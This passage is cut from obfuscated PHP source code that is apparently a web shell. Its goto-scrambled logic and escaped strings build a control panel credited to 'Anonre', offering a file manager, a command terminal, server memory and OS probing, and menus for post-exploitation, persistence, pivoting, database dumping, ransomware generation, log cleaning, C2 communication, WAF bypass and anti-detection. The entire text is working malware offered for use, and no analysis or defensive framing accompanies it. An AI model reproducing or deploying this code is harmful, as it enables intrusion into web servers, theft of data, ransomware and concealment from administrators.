preg_replace("\41\143\160\165\x20\x2b\41", '', $vjjvq[0])); goto dOzfT; TV9CB: xxbWs: goto m5JC3; EGeNd: $KWG1w = explode("\40", preg_replace("\x21\143\160\x75\x20\x2b\41", '', $wqr2f[0])); goto Ie6F4; qnD1R: $vjjvq = explode("\12", $H8jmy); goto z2zJH; j2EgD: if (!stristr(PHP_OS, "\127\111\x4e")) { goto xxbWs; } goto xB_Qp; nlXtP: } goto bVUvU; sdIm9: ob_clean(); goto jTnIY; NNso_: ny34N: goto Zub6s; bJ2m9: @date_default_timezone_set("\x55\x54\103"); goto MZKu4; AIGE_: XE004: goto sHjTd; YEa1Z: readfile($KLrez); goto S_Hc4; bVUvU: function eqrni() { goto wW1tS; bwxOy: return ["\x74\x6f\x74\141\154" => -1, "\165\163\x65\144" => -1]; goto uzhV2; En2mw: return ["\x74\x6f\164\141\x6c" => -1, "\x75\x73\145\144" => -1]; goto bJdn3; uzhV2: wIjiy: goto uemVx; kKoKQ: preg_match("\x2f\x4d\145\x6d\x41\x76\141\x69\x6c\x61\142\x6c\x65\x3a\x5c\x73\x2b\50\134\144\x2b\x29\x2f", $yb70j, $HTcDZ); goto EP6WR; UTC22: $omUSh = $kxVgv - $gaF0q; goto PNP92; bJdn3: ZSekH: goto w98TJ; EP6WR: $kxVgv = isset($BFnIj[1]) ? $BFnIj[1] * 1024 : 0; goto Z0rEx; EhD8X: if (!($yb70j === false)) { goto ZSekH; } goto En2mw; PNP92: return ["\x74\x6f\x74\141\154" => $kxVgv, "\165\163\x65\144" => $omUSh]; goto q8Stc; Z0rEx: $gaF0q = isset($HTcDZ[1]) ? $HTcDZ[1] * 1024 : 0; goto UTC22; w98TJ: preg_match("\x2f\x4d\145\x6d\124\157\x74\x61\154\x3a\134\163\53\50\134\144\x2b\x29\57", $yb70j, $BFnIj); goto kKoKQ; uemVx: $yb70j = @file_get_contents("\57\x70\x72\x6f\x63\x2f\155\x65\x6d\151\156\146\x6f"); goto EhD8X; wW1tS: if (!stristr(PHP_OS, "\x57\111\116")) { goto wIjiy; } goto bwxOy; q8Stc: } goto jlE2p; dxABb: if (!isset($_GET["\x70\150\x70\x69\x6e\146\x6f"])) { goto ro08K; } goto hNB2P; pmuGk: header("\x43\x6f\156\164\x65\x6e\x74\55\x54\171\160\x65\x3a\40\x74\x65\x78\x74\x2f\160\x6c\141\151\156\73\40\143\150\x61\x72\163\145\164\x3d\165\164\x66\x2d\x38"); goto hzwf6; zFiA8: echo "\74\57\x64\151\x76\76\12\x9\x9\x9\x9\x3c\x64\x69\166\x20\143\154\x61\x73\163\x3d\42\152\141\x6e\x75\x73\x2d\x74\x61\147\x6c\x69\156\x65\x22\x3e\x43\x72\145\x61\164\x65\x64\40\102\x79\40\x41\x6e\157\x6e\162\x65\40\360\237\230\210\x3c\x2f\x64\151\166\x3e\12\11\11\11\74\57\144\151\x76\x3e\12\x9\11\x3c\57\144\151\x76\76\xa\11\x9\74\57\x64\151\166\x3e\xa\x9\74\x2f\x64\x69\166\x3e\xa\x9\x3c\144\151\x76\x20\x63\x6c\141\163\x73\75\42\164\157\x70\55\156\141\x76\142\141\162\42\40\151\144\75\42\164\157\160\55\x6e\141\166\x62\x61\x72\x22\76\12\11\x9\x3c\x62\x75\x74\164\157\156\40\143\154\141\x73\x73\x3d\x22\156\x61\x76\x2d\143\x6f\154\154\141\160\163\145\55\142\x74\x6e\42\x20\x69\x64\x3d\x22\156\141\166\x2d\143\x6f\x6c\x6c\141\x70\163\x65\x2d\142\164\x6e\42\x20\x74\x69\x74\x6c\145\x3d\42\x54\157\147\147\154\x65\x20\116\x61\166\151\147\141\x74\151\157\156\40\x4d\x65\156\165\x22\x3e\342\x98\xb0\x20\x4d\145\156\x75\x3c\57\142\x75\x74\x74\157\156\76\12\11\11\74\x64\x69\x76\40\143\154\141\163\x73\75\42\156\141\x76\55\142\165\164\x74\157\156\x73\x2d\x63\x6f\156\x74\x61\x69\156\145\x72\42\x3e\12\11\11\74\142\x75\164\164\x6f\156\40\x63\154\141\x73\x73\x3d\42\x6e\x61\166\x2d\x62\165\x74\164\x6f\156\40\141\143\164\x69\x76\145\x22\40\x64\x61\x74\x61\55\x76\151\145\x77\x3d\x22\146\x69\x6c\145\x73\42\x3e\360\x9f\223\201\x20\106\x69\154\145\40\115\141\x6e\141\x67\145\x72\x3c\x2f\x62\x75\164\164\x6f\x6e\76\xa\11\11\x3c\x62\x75\x74\164\157\x6e\x20\x63\154\x61\163\163\75\42\x6e\141\166\55\x62\165\x74\164\x6f\x6e\42\x20\144\141\x74\141\55\x76\151\x65\167\x3d\42\x74\x65\162\155\151\x6e\141\x6c\42\76\xe2\x8c\xa8\xef\xb8\x8f\x20\124\x65\162\x6d\x69\x6e\141\154\74\x2f\x62\165\x74\x74\x6f\156\76\xa\11\11\74\142\x75\x74\x74\157\156\x20\143\x6c\141\163\163\75\x22\156\141\166\55\142\x75\164\x74\x6f\156\x22\40\144\x61\164\x61\55\x76\x69\x65\167\75\42\x64\157\x6d\x61\151\x6e\x2d\151\x6e\x74\145\154\x22\x3e\360\x9f\x9b\260\xef\xb8\x8f\40\104\x6f\155\141\x69\156\40\x49\x6e\x74\145\154\x3c\57\142\165\164\164\157\x6e\76\xa\x9\11\x3c\x62\x75\x74\164\157\156\x20\x63\x6c\141\163\x73\x3d\x22\156\141\166\x2d\x62\165\164\164\157\156\42\x20\x64\141\164\x61\x2d\166\151\145\x77\x3d\x22\x61\164\x74\141\143\153\55\145\x76\x61\163\151\157\156\42\76\xe2\232\x94\357\xb8\x8f\x20\101\164\164\141\x63\x6b\x20\46\40\x45\x76\x61\163\151\157\x6e\x3c\x2f\142\x75\164\164\x6f\x6e\x3e\12\11\x9\74\x62\x75\164\164\157\156\x20\143\154\141\163\x73\75\x22\156\141\166\x2d\x62\165\164\x74\157\156\42\x20\x64\x61\164\x61\55\166\x69\x65\167\75\42\x66\151\156\x67\x65\162\160\162\151\x6e\x74\42\76\360\237\x90\276\40\106\x69\156\x67\145\x72\x70\x72\151\x6e\164\74\57\142\x75\164\x74\157\156\x3e\xa\11\11\74\x62\x75\x74\x74\157\156\x20\x63\154\x61\163\x73\x3d\42\x6e\141\x76\55\142\x75\164\x74\157\156\42\40\144\x61\x74\x61\55\x76\151\x65\x77\75\x22\x63\x70\x61\156\145\154\55\143\155\x73\42\x3e\342\232\x99\357\xb8\x8f\x20\103\115\x53\x20\x26\40\143\120\141\x6e\145\154\74\x2f\142\165\164\164\157\156\76\xa\11\x9\x3c\x62\x75\x74\x74\x6f\x6e\x20\143\154\x61\163\163\75\42\156\141\x76\55\142\165\x74\x74\157\x6e\42\x20\x64\x61\x74\x61\x2d\x76\151\145\x77\75\x22\x64\141\x74\141\x62\141\x73\145\42\76\360\x9f\x97\204\357\xb8\x8f\40\104\x61\x74\x61\x62\141\x73\x65\74\57\142\165\x74\x74\157\x6e\76\xa\11\11\74\142\165\164\x74\157\156\40\x63\x6c\x61\x73\x73\75\x22\156\x61\x76\55\x62\165\x74\164\157\x6e\42\40\x64\141\x74\141\55\x76\x69\145\167\x3d\x22\x63\x6f\x6e\156\x65\143\x74\x22\76\xf0\237\220\232\40\103\x6f\156\x6e\x65\x63\x74\x3c\57\142\165\x74\164\x6f\156\x3e\xa\x9\x9\74\x62\x75\x74\164\x6f\156\40\x63\154\141\x73\x73\75\42\x6e\x61\x76\55\x62\x75\164\164\157\156\42\x20\144\x61\x74\x61\x2d\x76\x69\145\167\x3d\x22\160\151\166\157\x74\x22\76\xf0\x9f\224\x97\40\x50\151\x76\157\x74\x69\x6e\x67\74\x2f\142\165\164\x74\x6f\x6e\x3e\12\11\11\x3c\x62\x75\x74\164\x6f\x6e\40\x63\154\141\163\x73\75\x22\156\141\166\x2d\x62\165\x74\164\x6f\x6e\x22\40\144\x61\164\x61\55\x76\151\x65\x77\x3d\42\x6e\145\x74\167\157\162\x6b\x22\x3e\360\x9f\x8c\x90\40\116\145\164\167\157\162\153\74\x2f\x62\x75\164\x74\x6f\156\76\xa\11\x9\74\142\165\x74\164\x6f\x6e\x20\143\x6c\x61\163\163\x3d\42\x6e\141\166\55\142\165\164\x74\x6f\156\x22\x20\x64\x61\164\x61\55\166\x69\x65\x77\x3d\42\163\x65\x63\x75\x72\x69\x74\x79\x22\76\xf0\x9f\x9b\xa1\xef\270\x8f\40\105\x6e\165\155\145\162\141\x74\x69\157\x6e\74\57\x62\x75\164\x74\x6f\x6e\x3e\12\x9\11\74\142\x75\x74\x74\x6f\156\40\143\154\x61\163\x73\x3d\x22\156\x61\x76\55\142\x75\164\164\157\x6e\42\40\144\141\x74\141\x2d\x76\x69\145\x77\x3d\x22\160\157\x73\164\x2d\145\170\x70\x6c\x6f\151\x74\x61\x74\151\x6f\156\42\76\xf0\x9f\x94\245\x20\x50\157\x73\x74\55\105\x78\160\154\x6f\x69\x74\141\164\x69\157\156\74\57\x62\x75\164\164\157\x6e\x3e\12\11\x9\x3c\x62\x75\164\164\x6f\x6e\x20\143\x6c\141\163\x73\x3d\42\x6e\x61\166\x2d\142\165\164\164\157\156\x22\x20\144\x61\164\x61\55\x76\x69\145\x77\x3d\x22\160\x65\162\x73\151\163\164\145\156\143\x65\x22\x3e\xf0\237\x95\xb5\xef\270\x8f\40\120\145\x72\163\151\x73\x74\145\156\x63\145\x3c\x2f\142\x75\x74\164\x6f\x6e\76\12\x9\x9\74\x62\165\x74\x74\157\x6e\40\x63\x6c\x61\x73\x73\75\x22\156\x61\x76\x2d\142\165\164\x74\157\x6e\42\40\144\x61\x74\141\55\166\x69\145\167\x3d\42\144\141\164\141\x2d\x74\157\x6f\154\x73\42\x3e\xf0\237\223\xa6\x20\104\141\164\x61\40\x54\157\x6f\x6c\x73\x3c\57\x62\x75\x74\164\x6f\156\76\xa\x9\11\x3c\x62\x75\x74\164\x6f\156\x20\x63\x6c\x61\163\x73\75\42\x6e\141\166\55\x62\x75\164\x74\157\x6e\42\40\144\x61\x74\141\55\x76\151\x65\x77\x3d\42\x63\162\157\x6e\42\76\360\237\223\205\40\103\x72\157\x6e\x20\115\x61\156\141\147\x65\162\x3c\x2f\x62\x75\164\x74\x6f\x6e\x3e\xa\x9\x9\x3c\x62\165\x74\164\157\x6e\40\143\154\141\163\163\75\x22\156\141\x76\55\142\x75\x74\164\157\156\42\40\144\141\x74\141\55\x76\151\x65\x77\75\x22\x6d\141\x73\163\55\x75\x70\154\157\x61\144\145\x72\42\76\xf0\x9f\x9a\200\x20\115\x61\x73\163\x20\125\160\154\157\141\144\x65\162\x3c\57\142\x75\164\164\157\156\76\12\11\x9\x3c\x62\x75\164\164\x6f\156\x20\143\x6c\141\x73\x73\x3d\x22\x6e\141\x76\x2d\142\165\x74\164\x6f\x6e\x22\40\x64\141\164\x61\x2d\x76\x69\145\167\x3d\x22\145\166\141\x6c\x22\x3e\xf0\x9f\x90\230\40\x50\110\x50\40\105\166\141\x6c\74\x2f\142\165\x74\164\157\x6e\x3e\xa\11\x9\74\142\x75\164\x74\157\x6e\x20\x63\x6c\x61\x73\163\75\42\x6e\141\x76\55\x62\x75\164\x74\157\x6e\42\x20\144\x61\x74\141\55\x76\151\x65\167\75\42\x74\x6f\x6f\x6c\163\42\76\360\x9f\x9b\240\xef\270\x8f\x20\124\157\157\x6c\163\74\x2f\142\165\164\x74\157\x6e\x3e\12\11\x9\x3c\x62\165\164\x74\157\x6e\40\x63\x6c\x61\x73\163\75\42\156\141\x76\55\142\165\x74\x74\157\x6e\x22\40\144\141\164\x61\x2d\x76\x69\145\167\x3d\x22\143\157\154\165\155\156\55\x64\x75\155\x70\x65\162\42\76\360\x9f\x93\212\x20\103\x6f\154\x75\x6d\x6e\x20\x44\x75\x6d\x70\145\162\x3c\x2f\142\165\x74\164\x6f\156\x3e\xa\x9\11\x3c\x62\165\164\164\x6f\x6e\40\143\154\141\163\163\75\42\156\141\166\x2d\x62\x75\x74\164\157\x6e\x22\x20\144\141\164\141\x2d\x76\151\145\x77\x3d\x22\x64\x61\164\141\142\141\x73\145\55\144\x75\x6d\160\x65\162\42\76\360\237\x92\xbe\40\x44\141\164\x61\x62\x61\163\x65\x20\104\x75\x6d\x70\145\x72\x3c\57\142\x75\164\164\x6f\156\76\xa\x9\11\74\x62\x75\164\x74\x6f\x6e\40\143\x6c\x61\x73\x73\x3d\x22\x6e\141\166\55\142\x75\164\x74\x6f\156\x22\x20\144\x61\x74\141\x2d\166\151\145\x77\x3d\x22\157\x70\x65\x6e\x2d\x62\141\163\x65\144\151\x72\x22\x3e\xf0\237\x94\x93\x20\117\160\145\156\x20\x42\x61\163\x65\104\151\x72\74\57\x62\x75\x74\x74\157\x6e\76\xa\x9\11\x3c\x62\165\x74\164\x6f\x6e\x20\x63\x6c\141\x73\x73\x3d\x22\x6e\x61\x76\55\x62\165\164\x74\157\156\42\40\144\x61\x74\x61\55\166\x69\x65\167\75\x22\x66\141\153\x65\55\155\x61\x69\x6c\x22\76\360\237\x93\247\40\x46\x61\x6b\145\x20\115\141\151\154\x3c\57\142\x75\x74\x74\x6f\x6e\76\xa\11\11\74\x62\165\164\x74\x6f\x6e\x20\143\x6c\141\x73\163\75\42\x6e\141\x76\x2d\x62\x75\164\164\157\156\42\40\144\x61\164\141\55\166\x69\145\x77\x3d\42\x77\x68\155\143\163\55\144\x65\143\x6f\144\x65\162\x22\x3e\360\237\224\x90\x20\x57\110\115\103\x53\x20\104\145\143\157\x64\x65\162\x3c\57\142\x75\164\x74\157\156\x3e\12\x9\x9\74\x62\x75\x74\164\x6f\x6e\x20\x63\x6c\x61\x73\163\75\42\x6e\x61\166\x2d\x62\x75\164\x74\x6f\x6e\42\x20\144\x61\164\x61\x2d\166\x69\x65\x77\x3d\42\x66\x69\x6c\x65\55\167\141\x74\x63\150\x65\162\x22\x3e\xf0\237\x91\201\357\270\x8f\40\x46\151\154\145\40\x57\x61\x74\x63\150\145\162\74\x2f\x62\x75\x74\x74\157\x6e\x3e\xa\x9\11\74\x62\165\164\x74\x6f\156\x20\x63\x6c\141\x73\163\75\x22\x6e\141\x76\55\142\x75\x74\x74\x6f\x6e\42\x20\x64\x61\x74\x61\x2d\x76\151\145\x77\75\x22\x70\162\x6f\143\x65\x73\x73\55\155\x61\x6e\x61\147\145\x72\x22\76\342\x9a\231\xef\xb8\x8f\x20\120\x72\x6f\x63\x65\x73\163\x20\115\x61\x6e\x61\147\145\x72\74\x2f\x62\165\x74\164\x6f\156\76\12\11\x9\x3c\x62\165\164\x74\157\x6e\x20\143\154\141\x73\x73\x3d\42\x6e\141\x76\55\x62\165\x74\x74\x6f\156\x22\x20\144\141\x74\141\x2d\166\151\145\167\75\42\x70\141\x63\x6b\145\164\55\x63\x61\160\x74\165\162\145\42\x3e\360\x9f\223\xa1\x20\120\141\x63\x6b\145\164\40\103\x61\160\x74\x75\162\x65\x3c\57\142\165\x74\x74\x6f\156\76\12\x9\x9\x3c\x62\x75\164\164\157\x6e\40\x63\154\x61\163\x73\x3d\x22\x6e\141\166\55\x62\165\164\x74\157\x6e\42\40\x64\141\x74\141\55\x76\x69\x65\167\75\x22\x63\x72\171\x70\x74\157\x2d\164\157\157\x6c\163\x22\x3e\360\237\224\x90\40\103\162\x79\160\x74\x6f\40\124\157\157\x6c\163\74\x2f\x62\165\164\164\x6f\156\76\12\x9\11\x3c\142\x75\x74\164\157\x6e\40\x63\x6c\x61\163\163\75\x22\156\141\x76\55\142\x75\164\x74\157\156\x22\40\144\141\x74\x61\x2d\x76\151\x65\x77\75\x22\x61\144\166\141\x6e\x63\x65\144\x2d\164\x6f\157\154\x73\x22\x3e\xf0\x9f\x94\xa7\40\x41\144\x76\x61\156\x63\145\x64\x20\124\157\x6f\154\163\74\x2f\x62\165\164\x74\157\156\76\xa\11\x9\74\142\165\164\x74\x6f\156\x20\x63\x6c\x61\163\163\75\x22\x6e\141\x76\x2d\x62\165\164\x74\x6f\x6e\x22\40\x64\x61\x74\141\55\166\151\x65\x77\75\42\x77\145\142\x73\150\x65\154\154\x2d\x6d\141\x6e\x61\x67\x65\162\x22\x3e\360\237\x95\267\357\270\x8f\40\123\x68\x65\x6c\x6c\x20\x4d\141\x6e\x61\147\145\x72\x3c\x2f\142\165\x74\164\157\156\76\12\x9\x9\74\142\x75\x74\164\x6f\x6e\40\x63\x6c\141\163\163\75\x22\x6e\x61\166\55\x62\x75\164\164\157\x6e\42\x20\144\x61\x74\141\x2d\166\151\145\x77\x3d\x22\x72\141\x6e\x73\157\155\x2d\x63\162\145\141\164\x6f\162\42\x3e\xf0\237\222\x80\x20\x52\x61\x6e\x73\x6f\155\167\x61\162\x65\x20\x47\x65\x6e\x65\162\x61\164\157\162\74\57\142\165\x74\164\x6f\156\x3e\xa\x9\x9\x3c\142\165\x74\x74\157\156\40\143\x6c\141\163\163\x3d\x22\x6e\141\166\x2d\x62\x75\x74\164\x6f\x6e\42\x20\x64\x61\164\141\55\x76\151\145\167\x3d\42\141\x64\166\141\156\143\x65\144\x2d\x73\x74\145\141\154\164\150\x22\x3e\xf0\237\221\273\40\x53\164\145\x61\x6c\x74\x68\x20\x26\40\101\156\x74\x69\55\x44\x65\164\145\x63\x74\151\157\x6e\x3c\57\x62\165\164\x74\157\x6e\76\12\11\11\x3c\x62\165\164\x74\157\156\x20\x63\x6c\141\x73\163\x3d\42\x6e\141\x76\55\142\165\164\x74\x6f\156\42\40\x64\141\164\x61\x2d\166\x69\x65\x77\75\42\x6c\157\x67\55\x63\154\x65\x61\156\x65\x72\55\141\144\166\141\x6e\143\145\x64\42\76\360\237\xa7\xb9\x20\101\144\x76\141\156\x63\x65\x64\40\114\157\147\40\103\154\145\x61\156\145\x72\x3c\x2f\x62\x75\x74\164\157\x6e\76\12\11\x9\74\142\165\164\x74\157\156\40\x63\154\141\x73\163\x3d\42\x6e\x61\x76\55\142\x75\x74\x74\x6f\156\x22\40\144\x61\164\141\55\166\x69\145\167\75\42\155\x75\x6c\164\x69\x2d\142\141\x63\x6b\165\160\42\x3e\360\237\222\xbe\40\115\x75\154\x74\x69\55\x4c\157\143\x61\x74\x69\x6f\x6e\x20\x42\141\x63\153\x75\160\74\x2f\x62\165\x74\164\157\156\x3e\xa\11\x9\74\142\x75\x74\x74\157\156\40\x63\x6c\x61\163\x73\x3d\42\156\x61\x76\55\x62\x75\164\164\x6f\x6e\42\40\144\141\x74\141\x2d\x76\151\x65\x77\75\42\x63\62\x2d\143\x6f\155\155\165\x6e\151\x63\141\x74\151\x6f\156\42\x3e\360\237\223\xa1\40\x43\x32\x20\x43\157\155\x6d\165\x6e\x69\143\x61\x74\x69\x6f\156\74\57\x62\x75\164\164\157\156\x3e\xa\x9\11\74\142\165\x74\164\157\x6e\40\x63\154\x61\163\x73\x3d\x22\156\x61\166\55\142\165\164\x74\x6f\x6e\x22\40\x64\141\x74\141\55\x76\151\145\167\x3d\x22\x77\x61\x66\55\x62\x79\160\141\163\163\42\76\360\237\x9b\241\357\xb8\x8f\x20\x57\101\106\40\x42\171\x70\141\x73\x73\x3c\57\142\165\164\x74\x6f\x6e\76\xa\x9\x9\x3c\142\x75\x74\164\157\x6e\x20\x63\x6c\x61\x73\163\x3d\42\156\x61\x76\x2d\x62\165\x74\x74\157\156\x22\x20\x64\141\x74\141\55\x76\151\145\167\x3d\x22\163\171\163\164\145\155\x2d\160\162\x6f\x66\x69\154\145\162\x22\x3e\xf0\237\x94\215\x20\123\171\163\164\x65\x6d\x20\x50\162\x6f\x66\151\x6c\145\x72\74\57\142\x75\x74\164\157\x6e\76\xa\11\11\x3c\x62\165\x74\164\x6f\156\40\143\x6c\141\163\x73\75\x22\156\141\x76\x2d\x62\x75\164\x74\x6f\156\42\x20\x64\x61\164\141\x2d\166\151\145\167\x3d\42\155\x75\x6c\164\151\55\x73\150\x65\154\x6c\42\x3e\xf0\x9f\x8c\220\x20\x4d\165\154\x74\151\x2d\123\150\145\x6c\154\40\115\141\156\141\x67\145\x72\x3c\x2f\142\x75\x74\164\157\x6e\76\12\11\x9\x3c\142\165\164\164\157\x6e\40\143\154\141\163\x73\x3d\x22\156\x61\166\55\142\x75\x74\164\157\x6e\42\x20\144\x61\x74\x61\x2d\166\x69\145\x77\75\42\x65\156\150\141\x6e\143\145\x64\55\160\145\x72\163\151\x73\x74\x65\x6e\x63\x65\42\76\360\237\x94\x90\x20\x45\156\x68\141\x6e\x63\x65\x64\x20\120\x65\x72\163\151\163\x74\x65\156\x63\145\x3c\x2f\142\x75\x74\164\157\x6e\x3e\12\11\x9\74\x62\x75\164\164\x6f\x6e\x20\143\x6c\x61\163\x73\x3d\x22\156\141\166\x2d\142\165\x74\x74\157\156\42\x20\144\x61\164\141\55\166\x69\145\167\x3d\42\x64\145\x66\145\x6e\x64\42\76\xf0\237\x9b\241\xef\xb8\217\x20\x44\145\x66\x65\x6e\144\74\x2f\142\x75\x74\x74\x6f\156\x3e\12\11\11\x3c\x62\165\x74\164\157\x6e\x20\x63\x6c\x61\163\x73\75\42\x6e\x61\x76\x2d\x62\165\164\x74\157\156\x22\40\151\144\75\x22\156\x6f\164\x69\146\151\x63\x61\164\x69\157\x6e\55\142\164\x6e\42\x20\163\164\171\x6c\145\x3d\42\160\157\163\x69\164\x69\157\x6e\72\40\162\145\x6c\x61\x74\151\166\x65\73\x22\76\xf0\237\x94\x94\40\x4e\157\164\151\x66\x69\x63\x61\164\151\x6f\x6e\x73\x20\74\163\160\x61\x6e\x20\151\144\x3d\x22\156\x6f\x74\151\x66\x69\143\141\x74\x69\x6f\156\x2d\142\x61\144\x67\x65\x22\40\163\164\x79\x6c\x65\75\42\x64\151\163\160\154\141\x79\72\x6e\157\156\x65\x3b\x20\160\157\163\x69\x74\151\x6f\156\72\x20\141\x62\x73\x6f\x6c\165\x74\x65\x3b\x20\164\x6f\160\72\40\55\65\160\x78\x3b\x20\x72\x69\147\x68\164\x3a\40\x2d\x35\x70\170\73\40\x62\141\143\x6b\147\162\157\x75\156\x64\x3a\x20\166\x61\x72\x28\55\x2d\141\x63\x63\x65\x6e\164\x2d\162\145\x64\x29\73\40\143\157\154\x6f\x72\72\x20\167\x68\x69\x74\145\73\x20\x62\157\162\x64\145\x72\x2d\162\x61\x64\151\x75\x73\72\40\x35\60\45\73\x20\167\151\144\164\150\x3a\40\61\70\160\x78\73\x20\x68\145\151\147\150\164\72\x20\x31\70\160\x78\x3b\x20\146\x6f\156\x74\55\x73\151\172\x65\x3a\40\61\x30\x70\x78\73\x20\x64\151\x73\x70\154\x61\171\72\x20\146\x6c\x65\x78\x3b\x20\141\154\151\x67\x6e\55\x69\x74\145\x6d\x73\72\40\x63\145\x6e\x74\145\x72\73\40\x6a\165\x73\164\151\146\171\x2d\143\x6f\x6e\164\x65\x6e\x74\x3a\x20\143\x65\x6e\x74\x65\162\73\42\76\60\x3c\57\163\x70\x61\x6e\x3e\x3c\57\x62\x75\x74\164\x6f\156\x3e\12\x9\11\x3c\x2f\x64\x69\x76\76\12\x9\x3c\x2f\144\x69\166\76\12\40\11\74\x64\151\166\40\143\x6c\141\163\x73\x3d\x22\155\x61\x69\x6e\55\143\157\156\x74\x65\x6e\x74\42\x3e\12\40\11\11\x3c\144\151\x76\x20\151\144\x3d\x22\166\x69\145\x77\x2d\x64\141\163\x68\x62\157\141\162\144\x22\40\143\x6c\141\x73\x73\75\x22\x76\x69\x65\167\x2d\x63\157\156\164\x61\151\156\x65\x72\x22\x20\163\x74\x79\x6c\x65\x3d\x22\144\151\163\160\154\141\171\72\x6e\x6f\156\145\73\x22\x3e\74\57\x64\x69\x76\x3e\12\x20\x9\11\x3c\x64\151\166\40\x69\x64\75\x22\x76\151\145\x77\x2d\146\151\154\145\x73\x22\x20\x63\154\141\x73\x73\75\42\x76\x69\x65\x77\x2d\143\x6f\x6e\164\x61\x69\x6e\145\x72\42\40\x73\164\171\154\x65\75\x22\x64\x69\163\160\x6c\x61\171\72\x66\154\145\x78\73\x22\76\x3c\144\x69\x76\x20\x63\154\x61\x73\163\75\42\x63\x6f\x6e\x74\145\x6e\164\55\x68\x65\141\x64\x65\162\40\146\151\154\x65\55\x6d\x61\156\x61\x67\x65\162\55\143\x6f\156\164\x72\157\154\x73\x22\x3e\x3c\x69\x6e\x70\165\x74\x20\164\x79\x70\145\75\x22\164\x65\170\164\42\40\x69\x64\x3d\42\x63\167\144\42\40\x72\x65\141\x64\157\156\x6c\171\76\74\144\151\x76\76\74\142\x75\164\164\157\x6e\40\151\x64\x3d\42\x68\157\155\145\55\163\150\145\x6c\x6c\x2d\142\x74\x6e\x22\x20\163\x74\171\154\x65\75\x22\142\x61\143\153\147\162\157\x75\x6e\144\x2d\143\x6f\154\x6f\162\72\40\x76\141\162\x28\55\55\x61\x63\143\x65\156\x74\x2d\147\x6f\154\x64\51\73\42\x3e\x48\x6f\x6d\145\x20\x53\x68\145\x6c\154\x3c\x2f\x62\x75\x74\164\157\x6e\x3e\x3c\x62\x75\x74\x74\157\x6e\40\151\144\x3d\42\x63\162\x65\141\164\145\x2d\146\151\154\x65\55\x62\x74\156\x22\76\x4e\x65\x77\40\x46\151\154\x65\x3c\x2f\142\165\x74\x74\x6f\x6e\x3e\x3c\x62\165\x74\x74\157\x6e\40\x69\144\75\x22\143\162\145\x61\x74\x65\55\x64\x69\162\x2d\142\x74\x6e\x22\x3e\x4e\145\167\x20\104\x69\x72\x3c\x2f\x62\x75\164\x74\157\156\76\74\x69\x6e\160\x75\164\x20\164\171\x70\x65\75\x22\x66\151\154\x65\x22\40\151\144\75\x22\x75\x70\154\157\x61\144\x2d\x66\151\x6c\145\x2d\151\x6e\x70\x75\164\x22\40\x73\164\x79\154\145\75\42\x64\x69\163\x70\x6c\x61\x79\72\156\x6f\156\145\x3b\x22\x20\x6d\x75\x6c\164\151\x70\x6c\x65\x3e\74\142\x75\x74\x74\157\x6e\x20\157\x6e\x63\154\151\143\153\75\x22\144\x6f\143\165\155\145\x6e\164\56\147\x65\x74\x45\154\145\155\x65\156\x74\x42\x79\111\144\50\x27\165\160\154\x6f\x61\x64\x2d\146\x69\x6c\x65\x2d\x69\156\x70\x75\164\47\51\x2e\143\154\151\x63\x6b\50\x29\42\x3e\125\160\x6c\157\141\x64\x3c\x2f\x62\x75\x74\164\157\x6e\76\x3c\57\x64\151\166\76\74\x2f\x64\x69\x76\x3e\x3c\144\151\166\x20\x63\154\x61\163\x73\75\42\143\x6f\x6e\164\x65\x6e\164\55\141\162\x65\x61\40\146\151\154\145\x2d\x6d\141\x6e\x61\x67\145\x72\42\76\74\x74\x61\142\x6c\145\40\x63\x6c\x61\163\x73\75\x22\x72\x65\163\165\x6c\x74\163\x2d\x74\141\x62\x6c\145\x22\76\x3c\x74\150\x65\x61\x64\76\x3c\164\x72\76\x3c\164\150\x3e\x4e\141\155\145\74\57\164\x68\76\x3c\164\x68\x3e\123\x69\172\x65\x3c\57\x74\150\x3e\x3c\164\150\x3e\120\145\x72\x6d\151\163\163\x69\x6f\x6e\163\74\57\x74\150\x3e\x3c\x74\150\76\x4d\x6f\x64\151\146\x69\x65\x64\x3c\57\x74\x68\x3e\x3c\164\150\76\x41\143\164\x69\157\x6e\x73\74\57\x74\x68\76\x3c\x2f\x74\x72\76\x3c\x2f\x74\150\145\x61\x64\76\74\x74\x62\x6f\x64\x79\x20\151\144\75\x22\x66\151\x6c\x65\x2d\x6c\x69\x73\x74\x22\76\x3c\x2f\164\142\x6f\x64\x79\x3e\74\57\164\141\x62\x6c\145\x3e\x3c\x2f\x64\x69\166\x3e\x3c\57\144\151\x76\76\12\x20\x9\11\74\144\151\166\40\x69\144\75\x22\x76\151\145\167\x2d\164\x65\162\155\151\x6e\141\154\x22\x20\143\154\141\163\x73\75\x22\166\151\145\167\x2d\143\157\x6e\x74\x61\x69\x6e\145\x72\x22\76\x3c\x64\x69\x76\40\143\x6c\x61\x73\x73\75\42\143\x6f\156\x74\x65\x6e\x74\x2d\150\x65\141\144\145\x72\x22\76\124\145\x72\155\151\156\x61\x6c\x3c\x2f\144\x69\x76\x3e\74\x64\x69\x76\x20\143\154\141\x73\163\x3d\42\164\x65\162\155\x69\156\x61\x6c\x22\x20\157\156\x63\154\x69\143\x6b\x3d\x22\144\x6f\143\165\155\145\156\x74\56\x67\145\x74\105\x6c\145\155\145\x6e\164\x42\x79\111\x64\50\47\164\145\162\155\55\x69\156\160\x75\164\47\x29\x2e\146\157\x63\165\163\50\51\42\x3e\x3c\144\151\x76\x20\x69\x64\x3d\42\x74\145\162\155\55\x6f\x75\x74\x70\165\x74\42\76\x3c\x2f\x64\x69\166\76\74\x64\151\166\x20\143\x6c\x61\163\x73\75\x22\164\x65\x72\155\55\160\x72\x6f\x6d\160\x74\x22\x3e\x3c\163\x70\141\x6e\x20\x69\x64\x3d\x22\x74\145\162\155\55\x75\x73\x65\x72\x2d\x68\157\163\164\42\x3e\74\57\x73\x70\x61\x6e\76\x3a\74\163\160\141\x6e\40\151\x64\x3d\42\164\x65\162\155\x2d\143\167\x64\42\76\x3c\57\163\160\141\156\76\74\x73\160\141\156\x20\143\x6c\x61\163\x73\75\42\x70\x72\157\x6d\160\x74\x2d\163\x79\x6d\142\157\x6c\42\x3e\44\x3c\x2f\163\160\141\x6e\x3e\x3c\x2f\x64\x69\x76\x3e\74\x69\x6e\160\x75\x74\x20\x74\x79\x70\145\x3d\42\x74\145\170\164\x22\40\x69\144\75\x22\164\145\x72\155\55\151\156\x70\165\x74\42\40\x61\165\164\x6f\x63\x6f\x6d\x70\x6c\x65\164\145\75\x22\x6f\146\146\42\x20\x61\165\x74\157\146\x6f\143\165\163\x3e\x3c\57\144\151\x76\x3e\x3c\57\144\151\166\76\xa\x20\11\11\x3c\x64\151\x76\x20\151\x64\x